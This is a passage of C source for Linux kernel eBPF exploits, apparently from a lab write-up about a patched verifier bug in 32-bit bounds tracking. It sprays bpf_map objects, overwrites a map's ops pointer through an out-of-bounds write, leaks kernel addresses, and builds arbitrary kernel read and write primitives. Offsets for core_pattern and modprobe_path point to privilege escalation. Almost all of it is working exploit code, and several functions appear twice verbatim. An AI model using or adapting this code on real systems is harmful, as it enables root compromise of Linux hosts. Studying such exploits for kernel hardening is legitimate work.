          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] bpf_map_addr: 0x%016lx\n", bpf_map_addr);

  puts("[*] Restore corrupted map...");
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}

Leak addr of JIT code using oob read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) & 0xffff;
  printf("ops_containing_ret_offset: 0x%x\n", ops_containing_ret_offset);
  *(uint16_t*)(&buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i < sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &map_val);
    // printf("ret: 0x%x, val: 0x%lx\n", ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    write(socks[1], "Hello", 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

